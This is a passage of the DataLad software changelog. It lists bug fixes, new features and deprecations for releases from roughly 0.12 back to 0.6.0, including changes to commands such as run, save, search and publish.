committing\n changes under a subdirectory when the subdirectory was specified as\n a path argument. ([#3106][])\n- A workaround introduced in v0.11.1 made it possible for [save][] to\n do a partial commit with an annex file that has gone below the\n `annex.largefiles` threshold. The logic of this workaround was\n faulty, leading to files being displayed as typechanged in the index\n following the commit. ([#3365][])\n- The resolve_path() helper confused paths that had a semicolon for\n SSH RIs. ([#3425][])\n- The detection of SSH RIs has been improved. ([#3425][])\n\n## Enhancements and new features\n\n- The internal command runner was too aggressive in its decision to\n sleep. ([#3322][])\n- The \"INFO\" label in log messages now retains the default text color\n for the terminal rather than using white, which only worked well for\n terminals with dark backgrounds. ([#3334][])\n- A short flag `-R` is now available for the `--recursion-limit` flag,\n a flag shared by several subcommands. ([#3340][])\n- The authentication logic for [create-sibling-github][] has been\n revamped and now supports 2FA. ([#3180][])\n- New configuration option `datalad.ui.progressbar` can be used to\n configure the default backend for progress reporting (\"none\", for\n example, results in no progress bars being shown). ([#3396][])\n- A new progress backend, available by setting datalad.ui.progressbar\n to \"log\", replaces progress bars with a log message upon completion\n of an action. ([#3396][])\n- DataLad learned to consult the [NO_COLOR][] environment variable and\n the new `datalad.ui.color` configuration option when deciding to\n color output. The default value, \"auto\", retains the current\n behavior of coloring output if attached to a TTY ([#3407][]).\n- [clean][] now removes annex transfer directories, which is useful\n for cleaning up failed downloads. ([#3374][])\n- [clone][] no longer refuses to clone into a local path that looks\n like a URL, making its behavior consistent with `git clone`.\n ([#3425][])\n- [wtf][]\n - Learned to fall back to the `dist` package if `platform.dist`,\n which has been removed in the yet-to-be-release Python 3.8, does\n not exist. ([#3439][])\n - Gained a `--section` option for limiting the output to specific\n sections and a `--decor` option, which currently knows how to\n format the output as GitHub's `<details>` section. ([#3440][])\n\n# 0.11.4 (Mar 18, 2019) -- get-ready\n\nLargely a bug fix release with a few enhancements\n\n## Important\n\n- 0.11.x series will be the last one with support for direct mode of [git-annex][]\n which is used on crippled (no symlinks and no locking) filesystems.\n v7 repositories should be used instead.\n\n## Fixes\n\n- Extraction of .gz files is broken without p7zip installed. We now\n abort with an informative error in this situation. ([#3176][])\n\n- Committing failed in some cases because we didn't ensure that the\n path passed to `git read-tree --index-output=...` resided on the\n same filesystem as the repository. ([#3181][])\n\n- Some pointless warnings during metadata aggregation have been\n eliminated. ([#3186][])\n\n- With Python 3 the LORIS token authenticator did not properly decode\n a response ([#3205][]).\n\n- With Python 3 downloaders unnecessarily decoded the response when\n getting the status, leading to an encoding error. ([#3210][])\n\n- In some cases, our internal command Runner did not adjust the\n environment's `PWD` to match the current working directory specified\n with the `cwd` parameter. ([#3215][])\n\n- The specification of the pyliblzma dependency was broken. ([#3220][])\n\n- [search] displayed an uninformative blank log message in some\n cases. ([#3222][])\n\n- The logic for finding the location of the aggregate metadata DB\n anchored the search path incorrectly, leading to a spurious warning.\n ([#3241][])\n\n- Some progress bars were still displayed when stdout and stderr were\n not attached to a tty. ([#3281][])\n\n- Check for stdin/out/err to not be closed before checking for `.isatty`.\n ([#3268][])\n\n## Enhancements and new features\n\n- Creating a new repository now aborts if any of the files in the\n directory are tracked by a repository in a parent directory.\n ([#3211][])\n\n- [run] learned to replace the `{tmpdir}` placeholder in commands with\n a temporary directory. ([#3223][])\n \n- [duecredit][] support has been added for citing DataLad itself as\n well as datasets that an analysis uses. ([#3184][])\n\n- The `eval_results` interface helper unintentionally modified one of\n its arguments. ([#3249][])\n\n- A few DataLad constants have been added, changed, or renamed ([#3250][]):\n - `HANDLE_META_DIR` is now `DATALAD_DOTDIR`. The old name should be\n considered deprecated.\n - `METADATA_DIR` now refers to `DATALAD_DOTDIR/metadata` rather than\n `DATALAD_DOTDIR/meta` (which is still available as\n `OLDMETADATA_DIR`).\n - The new `DATASET_METADATA_FILE` refers to `METADATA_DIR/dataset.json`.\n - The new `DATASET_CONFIG_FILE` refers to `DATALAD_DOTDIR/config`.\n - `METADATA_FILENAME` has been renamed to `OLDMETADATA_FILENAME`.\n\n# 0.11.3 (Feb 19, 2019) -- read-me-gently\n\nJust a few of important fixes and minor enhancements.\n\n## Fixes\n\n- The logic for setting the maximum command line length now works\n around Python 3.4 returning an unreasonably high value for\n `SC_ARG_MAX` on Debian systems. ([#3165][])\n\n- DataLad commands that are conceptually \"read-only\", such as\n `datalad ls -L`, can fail when the caller lacks write permissions\n because git-annex tries merging remote git-annex branches to update\n information about availability. DataLad now disables\n `annex.merge-annex-branches` in some common \"read-only\" scenarios to\n avoid these failures. ([#3164][])\n\n## Enhancements and new features\n\n- Accessing an \"unbound\" dataset method now automatically imports the\n necessary module rather than requiring an explicit import from the\n Python caller. For example, calling `Dataset.add` no longer needs to\n be preceded by `from datalad.distribution.add import Add` or an\n import of `datalad.api`. ([#3156][])\n\n- Configuring the new variable `datalad.ssh.identityfile` instructs\n DataLad to pass a value to the `-i` option of `ssh`. ([#3149][])\n ([#3168][])\n\n# 0.11.2 (Feb 07, 2019) -- live-long-and-prosper\n\nA variety of bugfixes and enhancements\n\n## Major refactoring and deprecations\n\n- All extracted metadata is now placed under git-annex by default.\n Previously files smaller than 20 kb were stored in git. ([#3109][])\n- The function `datalad.cmd.get_runner` has been removed. ([#3104][])\n\n## Fixes\n\n- Improved handling of long commands:\n - The code that inspected `SC_ARG_MAX` didn't check that the\n reported value was a sensible, positive number. ([#3025][])\n - More commands that invoke `git` and `git-annex` with file\n arguments learned to split up the command calls when it is likely\n that the command would fail due to exceeding the maximum supported\n length. ([#3138][])\n- The `setup_yoda_dataset` procedure created a malformed\n .gitattributes line. ([#3057][])\n- [download-url][] unnecessarily tried to infer the dataset when\n `--no-save` was given. ([#3029][])\n- [rerun][] aborted too late and with a confusing message when a ref\n specified via `--onto` didn't exist. ([#3019][])\n- [run][]:\n - `run` didn't preserve the current directory prefix (\"./\") on\n inputs and outputs, which is problematic if the caller relies on\n this representation when formatting the command. ([#3037][])\n - Fixed a number of unicode py2-compatibility issues. ([#3035][]) ([#3046][])\n - To proceed with a failed command, the user was confusingly\n instructed to use `save` instead of `add` even though `run` uses\n `add` underneath. ([#3080][])\n- Fixed a case where the helper class for checking external modules\n incorrectly reported a module as unknown. ([#3051][])\n- [add-archive-content][] mishandled the archive path when the leading\n path contained a symlink. ([#3058][])\n- Following denied access, the credential code failed to consider a\n scenario, leading to a type error rather than an appropriate error\n message. ([#3091][])\n- Some tests failed when executed from a `git worktree` checkout of the\n source repository. ([#3129][])\n- During metadata extraction, batched annex processes weren't properly\n terminated, leading to issues on Windows. ([#3137][])\n- [add][] incorrectly handled an \"invalid repository\" exception when\n trying to add a submodule. ([#3141][])\n- Pass `GIT_SSH_VARIANT=ssh` to git processes to be able to specify\n alternative ports in SSH urls\n\n## Enhancements and new features\n\n- [search][] learned to suggest closely matching keys if there are no\n hits. ([#3089][])\n- [create-sibling][]\n - gained a `--group` option so that the caller can specify the file\n system group for the repository. ([#3098][])\n - now understands SSH URLs that have a port in them (i.e. the\n \"ssh://[user@]host.xz[:port]/path/to/repo.git/\" syntax mentioned\n in `man git-fetch`). ([#3146][])\n- Interface classes can now override the default renderer for\n summarizing results. ([#3061][])\n- [run][]:\n - `--input` and `--output` can now be shortened to `-i` and `-o`.\n ([#3066][])\n - Placeholders such as \"{inputs}\" are now expanded in the command\n that is shown in the commit message subject. ([#3065][])\n - `interface.run.run_command` gained an `extra_inputs` argument so\n that wrappers like [datalad-container][] can specify additional inputs\n that aren't considered when formatting the command string. ([#3038][])\n - \"--\" can now be used to separate options for `run` and those for\n the command in ambiguous cases. ([#3119][])\n- The utilities `create_tree` and `ok_file_has_content` now support\n \".gz\" files. ([#3049][])\n- The Singularity container for 0.11.1 now uses [nd_freeze][] to make\n its builds reproducible.\n- A [publications][] page has been added to the documentation. ([#3099][])\n- `GitRepo.set_gitattributes` now accepts a `mode` argument that\n controls whether the .gitattributes file is appended to (default) or\n overwritten. ([#3115][])\n- `datalad --help` now avoids using `man` so that the list of\n subcommands is shown. ([#3124][])\n\n# 0.11.1 (Nov 26, 2018) -- v7-better-than-v6\n\nRushed out bugfix release to stay fully compatible with recent\n[git-annex][] which introduced v7 to replace v6.\n\n## Fixes\n\n- [install][]: be able to install recursively into a dataset ([#2982][])\n- [save][]: be able to commit/save changes whenever files potentially\n could have swapped their storage between git and annex\n ([#1651][]) ([#2752][]) ([#3009][])\n- [aggregate-metadata][]:\n - dataset's itself is now not \"aggregated\" if specific paths are\n provided for aggregation ([#3002][]). That resolves the issue of\n `-r` invocation aggregating all subdatasets of the specified dataset\n as well\n - also compare/verify the actual content checksum of aggregated metadata\n while considering subdataset metadata for re-aggregation ([#3007][])\n- `annex` commands are now chunked assuming 50% \"safety margin\" on the\n maximal command line length. Should resolve crashes while operating\n of too many files at ones ([#3001][])\n- `run` sidecar config processing ([#2991][])\n- no double trailing period in docs ([#2984][])\n- correct identification of the repository with symlinks in the paths\n in the tests ([#2972][])\n- re-evaluation of dataset properties in case of dataset changes ([#2946][])\n- [text2git][] procedure to use `ds.repo.set_gitattributes`\n ([#2974][]) ([#2954][])\n- Switch to use plain `os.getcwd()` if inconsistency with env var\n `$PWD` is detected ([#2914][])\n- Make sure that credential defined in env var takes precedence\n ([#2960][]) ([#2950][])\n\n## Enhancements and new features\n\n- [shub://datalad/datalad:git-annex-dev](https://singularity-hub.org/containers/5663/view)\n provides a Debian buster Singularity image with build environment for\n [git-annex][]. `tools/bisect-git-annex` provides a helper for running\n `git bisect` on git-annex using that Singularity container ([#2995][])\n- Added `.zenodo.json` for better integration with Zenodo for citation\n- [run-procedure][] now provides names and help messages with a custom\n renderer for ([#2993][])\n- Documentation: point to [datalad-revolution][] extension (prototype of\n the greater DataLad future)\n- [run][]\n - support injecting of a detached command ([#2937][])\n- `annex` metadata extractor now extracts `annex.key` metadata record.\n Should allow now to identify uses of specific files etc ([#2952][])\n- Test that we can install from http://datasets.datalad.org\n- Proper rendering of `CommandError` (e.g. in case of \"out of space\"\n error) ([#2958][])\n\n\n# 0.11.0 (Oct 23, 2018) -- Soon-to-be-perfect\n\n[git-annex][] 6.20180913 (or later) is now required - provides a number of\nfixes for v6 mode operations etc.\n\n## Major refactoring and deprecations\n\n- `datalad.consts.LOCAL_CENTRAL_PATH` constant was deprecated in favor\n of `datalad.locations.default-dataset` [configuration][config] variable\n ([#2835][])\n\n## Minor refactoring\n\n- `\"notneeded\"` messages are no longer reported by default results\n renderer\n- [run][] no longer shows commit instructions upon command failure when\n `explicit` is true and no outputs are specified ([#2922][])\n- `get_git_dir` moved into GitRepo ([#2886][])\n- `_gitpy_custom_call` removed from GitRepo ([#2894][])\n- `GitRepo.get_merge_base` argument is now called `commitishes` instead\n of `treeishes` ([#2903][])\n\n## Fixes\n\n- [update][] should not leave the dataset in non-clean state ([#2858][])\n and some other enhancements ([#2859][])\n- Fixed chunking of the long command lines to account for decorators\n and other arguments ([#2864][])\n- Progress bar should not crash the process on some missing progress\n information ([#2891][])\n- Default value for `jobs` set to be `\"auto\"` (not `None`) to take\n advantage of possible parallel get if in `-g` mode ([#2861][])\n- [wtf][] must not crash if `git-annex` is not installed etc ([#2865][]),\n ([#2865][]), ([#2918][]), ([#2917][])\n- Fixed paths (with spaces etc) handling while reporting annex error\n output ([#2892][]), ([#2893][])\n- `__del__` should not access `.repo` but `._repo` to avoid attempts\n for reinstantiation etc ([#2901][])\n- Fix up submodule `.git` right in `GitRepo.add_submodule` to avoid\n added submodules being non git-annex friendly ([#2909][]), ([#2904][])\n- [run-procedure][] ([#2905][])\n - now will provide dataset into the procedure if called within dataset\n - will not crash if procedure is an executable without `.py` or `.sh`\n suffixes\n- Use centralized `.gitattributes` handling while setting annex backend\n ([#2912][])\n- `GlobbedPaths.expand(..., full=True)` incorrectly returned relative\n paths when called more than once ([#2921][])\n\n## Enhancements and new features\n\n- Report progress on [clone][] when installing from \"smart\" git servers\n ([#2876][])\n- Stale/unused `sth_like_file_has_content` was removed ([#2860][])\n- Enhancements to [search][] to operate on \"improved\" metadata layouts\n ([#2878][])\n- Output of `git annex init` operation is now logged ([#2881][])\n- New\n - `GitRepo.cherry_pick` ([#2900][])\n - `GitRepo.format_commit` ([#2902][])\n- [run-procedure][] ([#2905][])\n - procedures can now recursively be discovered in subdatasets as well.\n The uppermost has highest priority\n - Procedures in user and system locations now take precedence over\n those in datasets.\n\n# 0.10.3.1 (Sep 13, 2018) -- Nothing-is-perfect\n\nEmergency bugfix to address forgotten boost of version in\n`datalad/version.py`.\n\n# 0.10.3 (Sep 13, 2018) -- Almost-perfect\n\nThis is largely a bugfix release which addressed many (but not yet all)\nissues of working with git-annex direct and version 6 modes, and operation\non Windows in general. Among enhancements you will see the\nsupport of public S3 buckets (even with periods in their names),\nability to configure new providers interactively, and improved `egrep`\nsearch backend.\n\nAlthough we do not require with this release, it is recommended to make\nsure that you are using a recent `git-annex` since it also had a variety\nof fixes and enhancements in the past months.\n\n## Fixes\n\n- Parsing of combined short options has been broken since DataLad\n v0.10.0. ([#2710][])\n- The `datalad save` instructions shown by `datalad run` for a command\n with a non-zero exit were incorrectly formatted. ([#2692][])\n- Decompression of zip files (e.g., through `datalad\n add-archive-content`) failed on Python 3. ([#2702][])\n- Windows:\n - colored log output was not being processed by colorama. ([#2707][])\n - more codepaths now try multiple times when removing a file to deal\n with latency and locking issues on Windows. ([#2795][])\n- Internal git fetch calls have been updated to work around a\n GitPython `BadName` issue. ([#2712][]), ([#2794][])\n- The progress bar for annex file transferring was unable to handle an\n empty file. ([#2717][])\n- `datalad add-readme` halted when no aggregated metadata was found\n rather than displaying a warning. ([#2731][])\n- `datalad rerun` failed if `--onto` was specified and the history\n contained no run commits. ([#2761][])\n- Processing of a command's results failed on a result record with a\n missing value (e.g., absent field or subfield in metadata). Now the\n missing value is rendered as \"N/A\". ([#2725][]).\n- A couple of documentation links in the \"Delineation from related\n solutions\" were misformatted. ([#2773][])\n- With the latest git-annex, several known V6 failures are no longer\n an issue. ([#2777][])\n- In direct mode, commit changes would often commit annexed content as\n regular Git files. A new approach fixes this and resolves a good\n number of known failures. ([#2770][])\n- The reporting of command results failed if the current working\n directory was removed (e.g., after an unsuccessful `install`). ([#2788][])\n- When installing into an existing empty directory, `datalad install`\n removed the directory after a failed clone. ([#2788][])\n- `datalad run` incorrectly handled inputs and outputs for paths with\n spaces and other characters that require shell escaping. ([#2798][])\n- Globbing inputs and outputs for `datalad run` didn't work correctly\n if a subdataset wasn't installed. ([#2796][])\n- Minor (in)compatibility with git 2.19 - (no) trailing period\n in an error message now. ([#2815][])\n\n## Enhancements and new features\n\n- Anonymous access is now supported for S3 and other downloaders. ([#2708][])\n- A new interface is available to ease setting up new providers. ([#2708][])\n- Metadata: changes to egrep mode search ([#2735][])\n - Queries in egrep mode are now case-sensitive when the query\n contains any uppercase letters and are case-insensitive otherwise.\n The new mode egrepcs can be used to perform a case-sensitive query\n with all lower-case letters.\n - Search can now be limited to a specific key.\n - Multiple queries (list of expressions) are evaluated using AND to\n determine whether something is a hit.\n - A single multi-field query (e.g., `pa*:findme`) is a hit, when any\n matching field matches the query.\n - All matching key/value combinations across all (multi-field)\n queries are reported in the query_matched result field.\n - egrep mode now shows all hits rather than limiting the results to\n the top 20 hits.\n- The documentation on how to format commands for `datalad run` has\n been improved. ([#2703][])\n- The method for determining the current working directory on Windows\n has been improved. ([#2707][])\n- `datalad --version` now simply shows the version without the\n license. ([#2733][])\n- `datalad export-archive` learned to export under an existing\n directory via its `--filename` option. ([#2723][])\n- `datalad export-to-figshare` now generates the zip archive in the\n root of the dataset unless `--filename` is specified. ([#2723][])\n- After importing `datalad.api`, `help(datalad.api)` (or\n `datalad.api?` in IPython) now shows a summary of the available\n DataLad commands. ([#2728][])\n- Support for using `datalad` from IPython has been improved. ([#2722][])\n- `datalad wtf` now returns structured data and reports the version of\n each extension. ([#2741][])\n- The internal handling of gitattributes information has been\n improved. A user-visible consequence is that `datalad create\n --force` no longer duplicates existing attributes. ([#2744][])\n- The \"annex\" metadata extractor can now be used even when no content\n is present. ([#2724][])\n- The `add_url_to_file` method (called by commands like `datalad\n download-url` and `datalad add-archive-content`) learned how to\n display a progress bar. ([#2738][])\n\n\n# 0.10.2 (Jul 09, 2018) -- Thesecuriestever\n\nPrimarily a bugfix release to accommodate recent git-annex release\nforbidding file:// and http://localhost/ URLs which might lead to\nrevealing private files if annex is publicly shared.\n\n## Fixes\n\n- fixed testing to be compatible with recent git-annex (6.20180626)\n- [download-url][] will now download to current directory instead of the\n top of the dataset\n\n## Enhancements and new features\n\n- do not quote ~ in URLs to be consistent with quote implementation in\n Python 3.7 which now follows RFC 3986\n- [run][] support for user-configured placeholder values\n- documentation on native git-annex metadata support\n- handle 401 errors from LORIS tokens\n- `yoda` procedure will instantiate `README.md`\n- `--discover` option added to [run-procedure][] to list available\n procedures\n\n# 0.10.1 (Jun 17, 2018) -- OHBM polish\n\nThe is a minor bugfix release.\n\n## Fixes\n\n- Be able to use backports.lzma as a drop-in replacement for pyliblzma.\n- Give help when not specifying a procedure name in `run-procedure`.\n- Abort early when a downloader received no filename.\n- Avoid `rerun` error when trying to unlock non-available files.\n\n# 0.10.0 (Jun 09, 2018) -- The Release\n\nThis release is a major leap forward in metadata support.\n\n## Major refactoring and deprecations\n\n- Metadata\n - Prior metadata provided by datasets under `.datalad/meta` is no\n longer used or supported. Metadata must be reaggregated using 0.10\n version\n - Metadata extractor types are no longer auto-guessed and must be\n explicitly specified in `datalad.metadata.nativetype` config\n (could contain multiple values)\n - Metadata aggregation of a dataset hierarchy no longer updates all\n datasets in the tree with new metadata. Instead, only the target\n dataset is updated. This behavior can be changed via the --update-mode\n switch. The new default prevents needless modification of (3rd-party)\n subdatasets.\n - Neuroimaging metadata support has been moved into a dedicated extension:\n https://github.com/datalad/datalad-neuroimaging\n- Crawler\n - moved into a dedicated extension:\n https://github.com/datalad/datalad-crawler\n- `export_tarball` plugin has been generalized to `export_archive` and\n can now also generate ZIP archives.\n- By default a dataset X is now only considered to be a super-dataset of\n another dataset Y, if Y is also a registered subdataset of X.\n\n## Fixes\n\nA number of fixes did not make it into the 0.9.x series:\n\n- Dynamic configuration overrides via the `-c` option were not in effect.\n- `save` is now more robust with respect to invocation in subdirectories\n of a dataset.\n- `unlock` now reports correct paths when running in a dataset subdirectory.\n- `get` is more robust to path that contain symbolic links.\n- symlinks to subdatasets of a dataset are now correctly treated as a symlink,\n and not as a subdataset\n- `add` now correctly saves staged subdataset additions.\n- Running `datalad save` in a dataset no longer adds untracked content to the\n dataset. In order to add content a path has to be given, e.g. `datalad save .`\n- `wtf` now works reliably with a DataLad that wasn't installed from Git (but,\n e.g., via pip)\n- More robust URL handling in `simple_with_archives` crawler pipeline.\n\n## Enhancements and new features\n\n- Support for DataLad extension that can contribute API components from 3rd-party sources,\n incl. commands, metadata extractors, and test case implementations.\n See https://github.com/datalad/datalad-extension-template for a demo extension.\n- Metadata (everything has changed!)\n - Metadata extraction and aggregation is now supported for datasets and individual\n files.\n - Metadata query via `search` can now discover individual files.\n - Extracted metadata can now be stored in XZ compressed files, is optionally\n annexed (when exceeding a configurable size threshold), and obtained on\n demand (new configuration option `datalad.metadata.create-aggregate-annex-limit`).\n - Status and availability of aggregated metadata can now be reported via\n `metadata --get-aggregates`\n - New configuration option `datalad.metadata.maxfieldsize` to exclude too large\n metadata fields from aggregation.\n - The type of metadata is no longer guessed during metadata extraction. A new\n configuration option `datalad.metadata.nativetype` was introduced to enable\n one or more particular metadata extractors for a dataset.\n - New configuration option `datalad.metadata.store-aggregate-content` to enable\n the storage of aggregated metadata for dataset content (i.e. file-based metadata)\n in contrast to just metadata describing a dataset as a whole.\n- `search` was completely reimplemented. It offers three different modes now:\n - 'egrep' (default): expression matching in a plain string version of metadata\n - 'textblob': search a text version of all metadata using a fully featured\n query language (fast indexing, good for keyword search)\n - 'autofield': search an auto-generated index that preserves individual fields\n of metadata that can be represented in a tabular structure (substantial\n indexing cost, enables the most detailed queries of all modes)\n- New extensions:\n - [addurls][], an extension for creating a dataset (and possibly subdatasets)\n from a list of URLs.\n - export_to_figshare\n - extract_metadata\n- add_readme makes use of available metadata\n- By default the wtf extension now hides sensitive information, which can be\n included in the output by passing `--senstive=some` or `--senstive=all`.\n- Reduced startup latency by only importing commands necessary for a particular\n command line call.\n- [create][]:\n - `-d <parent> --nosave` now registers subdatasets, when possible.\n - `--fake-dates` configures dataset to use fake-dates\n- [run][] now provides a way for the caller to save the result when a\n command has a non-zero exit status.\n- `datalad rerun` now has a `--script` option that can be used to extract\n previous commands into a file.\n- A DataLad Singularity container is now available on\n [Singularity Hub](https://singularity-hub.org/collections/667).\n- More casts have been embedded in the [use case section of the documentation](http://docs.datalad.org/en/docs/usecases/index.html).\n- `datalad --report-status` has a new value 'all' that can be used to\n temporarily re-enable reporting that was disable by configuration settings.\n\n\n# 0.9.3 (Mar 16, 2018) -- pi+0.02 release\n\nSome important bug fixes which should improve usability\n\n## Fixes\n\n- `datalad-archives` special remote now will lock on acquiring or\n extracting an archive - this allows for it to be used with -J flag\n for parallel operation\n- relax introduced in 0.9.2 demand on git being configured for datalad\n operation - now we will just issue a warning\n- `datalad ls` should now list \"authored date\" and work also for datasets\n in detached HEAD mode\n- `datalad save` will now save original file as well, if file was\n \"git mv\"ed, so you can now `datalad run git mv old new` and have\n changes recorded\n\n## Enhancements and new features\n\n- `--jobs` argument now could take `auto` value which would decide on\n # of jobs depending on the # of available CPUs.\n `git-annex` > 6.20180314 is recommended to avoid regression with -J.\n- memoize calls to `RI` meta-constructor -- should speed up operation a\n bit\n- `DATALAD_SEED` environment variable could be used to seed Python RNG\n and provide reproducible UUIDs etc (useful for testing and demos)\n\n\n# 0.9.2 (Mar 04, 2018) -- it is (again) better than ever\n\nLargely a bugfix release with a few enhancements.\n\n## Fixes\n\n- Execution of external commands (git) should not get stuck when\n lots of both stdout and stderr output, and should not loose remaining\n output in some cases\n- Config overrides provided in the command line (-c) should now be\n handled correctly\n- Consider more remotes (not just tracking one, which might be none)\n while installing subdatasets\n- Compatibility with git 2.16 with some changed behaviors/annotations\n for submodules\n- Fail `remove` if `annex drop` failed\n- Do not fail operating on files which start with dash (-)\n- URL unquote paths within S3, URLs and DataLad RIs (///)\n- In non-interactive mode fail if authentication/access fails\n- Web UI:\n - refactored a little to fix incorrect listing of submodules in\n subdirectories\n - now auto-focuses on search edit box upon entering the page\n- Assure that extracted from tarballs directories have executable bit set\n\n## Enhancements and new features\n\n- A log message and progress bar will now inform if a tarball to be\n downloaded while getting specific files\n (requires git-annex > 6.20180206)\n- A dedicated `datalad rerun` command capable of rerunning entire\n sequences of previously `run` commands.\n **Reproducibility through VCS. Use `run` even if not interested in `rerun`**\n- Alert the user if `git` is not yet configured but git operations\n are requested\n- Delay collection of previous ssh connections until it is actually\n needed. Also do not require ':' while specifying ssh host\n- AutomagicIO: Added proxying of isfile, lzma.LZMAFile and io.open\n- Testing:\n - added DATALAD_DATASETS_TOPURL=http://datasets-tests.datalad.org to\n run tests against another website to not obscure access stats\n - tests run against temporary HOME to avoid side-effects\n - better unit-testing of interactions with special remotes\n- CONTRIBUTING.md describes how to setup and use `git-hub` tool to\n \"attach\" commits to an issue making it into a PR\n- DATALAD_USE_DEFAULT_GIT env variable could be used to cause DataLad\n to use default (not the one possibly bundled with git-annex) git\n- Be more robust while handling not supported requests by annex in\n special remotes\n- Use of `swallow_logs` in the code was refactored away -- less\n mysteries now, just increase logging level\n- `wtf` plugin will report more information about environment, externals\n and the system\n\n\n# 0.9.1 (Oct 01, 2017) -- \"DATALAD!\"(JBTM)\n\nMinor bugfix release\n\n## Fixes\n\n- Should work correctly with subdatasets named as numbers of bool\n values (requires also GitPython >= 2.1.6)\n- Custom special remotes should work without crashing with \n git-annex >= 6.20170924\n\n\n# 0.9.0 (Sep 19, 2017) -- isn't it a lucky day even though not a Friday?\n\n## Major refactoring and deprecations\n\n- the `files` argument of [save][] has been renamed to `path` to be uniform with\n any other command\n- all major commands now implement more uniform API semantics and result reporting.\n Functionality for modification detection of dataset content has been completely replaced\n with a more efficient implementation\n- [publish][] now features a `--transfer-data` switch that allows for a\n disambiguous specification of whether to publish data -- independent of\n the selection which datasets to publish (which is done via their paths).\n Moreover, [publish][] now transfers data before repository content is pushed.\n\n## Fixes\n\n- [drop][] no longer errors when some subdatasets are not installed\n- [install][] will no longer report nothing when a Dataset instance was\n given as a source argument, but rather perform as expected\n- [remove][] doesn't remove when some files of a dataset could not be dropped\n- [publish][] \n - no longer hides error during a repository push\n - publish behaves \"correctly\" for `--since=` in considering only the\n differences the last \"pushed\" state\n - data transfer handling while publishing with dependencies, to github\n- improved robustness with broken Git configuration\n- [search][] should search for unicode strings correctly and not crash\n- robustify git-annex special remotes protocol handling to allow for spaces in\n the last argument\n- UI credentials interface should now allow to Ctrl-C the entry\n- should not fail while operating on submodules named with\n numerics only or by bool (true/false) names\n- crawl templates should not now override settings for `largefiles` if \n specified in `.gitattributes`\n\n\n## Enhancements and new features\n\n- **Exciting new feature** [run][] command to protocol execution of an external \n command and rerun computation if desired. \n See [screencast](http://datalad.org/features.html#reproducible-science)\n- [save][] now uses Git for detecting with sundatasets need to be inspected for\n potential changes, instead of performing a complete traversal of a dataset tree\n- [add][] looks for changes relative to the last committed state of a dataset\n to discover files to add more efficiently\n- [diff][] can now report untracked files in addition to modified files\n- [uninstall][] will check itself whether a subdataset is properly registered in a\n superdataset, even when no superdataset is given in a call\n- [subdatasets][] can now configure subdatasets for exclusion from recursive\n installation (`datalad-recursiveinstall` submodule configuration property)\n- precrafted pipelines of [crawl][] now will not override `annex.largefiles`\n setting if any was set within `.gitattribues` (e.g. by `datalad create --text-no-annex`)\n- framework for screencasts: `tools/cast*` tools and sample cast scripts under\n `doc/casts` which are published at [datalad.org/features.html](http://datalad.org/features.html)\n- new [project YouTube channel](https://www.youtube.com/channel/UCB8-Zf7D0DSzAsREoIt0Bvw) \n- tests failing in direct and/or v6 modes marked explicitly\n\n# 0.8.1 (Aug 13, 2017) -- the best birthday gift\n\nBugfixes\n\n## Fixes\n\n- Do not attempt to [update][] a not installed sub-dataset\n- In case of too many files to be specified for [get][] or [copy_to][], we\n will make multiple invocations of underlying git-annex command to not\n overfill command line\n- More robust handling of unicode output in terminals which might not support it\n\n## Enhancements and new features\n\n- Ship a copy of numpy.testing to facilitate [test][] without requiring numpy\n as dependency. Also allow to pass to command which test(s) to run\n- In [get][] and [copy_to][] provide actual original requested paths, not the\n ones we deduced need to be transferred, solely for knowing the total\n\n\n# 0.8.0 (Jul 31, 2017) -- it is better than ever\n\nA variety of fixes and enhancements\n\n## Fixes\n\n- [publish][] would now push merged `git-annex` branch even if no other changes\n were done\n- [publish][] should be able to publish using relative path within SSH URI\n (git hook would use relative paths)\n- [publish][] should better tollerate publishing to pure git and `git-annex` \n special remotes \n\n## Enhancements and new features\n\n- [plugin][] mechanism came to replace [export][]. See [export_tarball][] for the\n replacement of [export][]. Now it should be easy to extend datalad's interface\n with custom functionality to be invoked along with other commands.\n- Minimalistic coloring of the results rendering\n- [publish][]/`copy_to` got progress bar report now and support of `--jobs`\n- minor fixes and enhancements to crawler (e.g. support of recursive removes)\n\n\n# 0.7.0 (Jun 25, 2017) -- when it works - it is quite awesome!\n\nNew features, refactorings, and bug fixes.\n\n## Major refactoring and deprecations\n\n- [add-sibling][] has been fully replaced by the [siblings][] command\n- [create-sibling][], and [unlock][] have been re-written to support the\n same common API as most other commands\n\n## Enhancements and new features\n\n- [siblings][] can now be used to query and configure a local repository by\n using the sibling name ``here``\n- [siblings][] can now query and set annex preferred content configuration. This\n includes ``wanted`` (as previously supported in other commands), and now\n also ``required``\n- New [metadata][] command to interface with datasets/files [meta-data][] \n- Documentation for all commands is now built in a uniform fashion\n- Significant parts of the documentation of been updated\n- Instantiate GitPython's Repo instances lazily\n\n## Fixes\n\n- API documentation is now rendered properly as HTML, and is easier to browse by\n having more compact pages\n- Closed files left open on various occasions (Popen PIPEs, etc)\n- Restored basic (consumer mode of operation) compatibility with Windows OS \n\n\n# 0.6.0 (Jun 14, 2017) -- German perfectionism\n\nThis release includes a **huge** refactoring to make code base and functionality\nmore robust and flexible\n\n- outputs from API commands could now be highly customized. See\n `--output-format`, `--report-status`, `--report-type`, and `--report-type`\n options for [datalad][] command.\n- effort was made to refactor code base so that underlying functions behave as\n generators where possible\n- input paths/arguments analysis was redone for majority of the commands to provide\n unified behavior\n\n## Major refactoring and deprecations\n\n- `add-sibling` and `rewrite-urls` were refactored in favor of new [siblings][]\n command which should be used for siblings manipulations\n- 'datalad.api.alwaysrender' config setting/support is removed in favor of new\n outputs processing\n\n## Fixes\n\n- Do not flush manually git index in pre-commit to avoid \"Death by the Lock\" issue\n- Deployed by [publish][] `post-update` hook script now should be more robust\n (tolerate directory names with spaces, etc.)\n- A variety of fixes, see\n [list of pull requests and issues closed](https://github.com/datalad/datalad/milestone/41?closed=1)\n for more information\n\n## Enhancements and new features\n\n- new [annotate-paths][] plumbing command to inspect and annotate provided\n paths. Use `--modified` to summarize changes between different points in\n the history\n- new [clone][] plumbing command to provide a subset (install a single dataset\n from a URL) functionality of [install][]\n- new [diff][] plumbing command\n- new [siblings][] command to list or manipulate siblings\n- new [subdatasets][] command to list subdatasets and their properties\n- [drop][] and [remove][] commands were refactored\n- `benchmarks/` collection of [Airspeed velocity](https://github.com/spacetelescope/asv/)\n benchmarks initiated. See reports at http://datalad.github.io/datalad/\n- crawler would try to download a new url multiple times increasing delay between\n attempts. Helps to resolve problems with extended crawls of Amazon S3\n- [CRCNS][] crawler pipeline now also fetches and aggregates meta-data for the\n datasets from datacite\n- overall optimisations to benefit from the aforementioned refactoring and\n improve user-experience\n- a few stub and not (yet) implemented commands (e.g. `move`) were removed from\n the 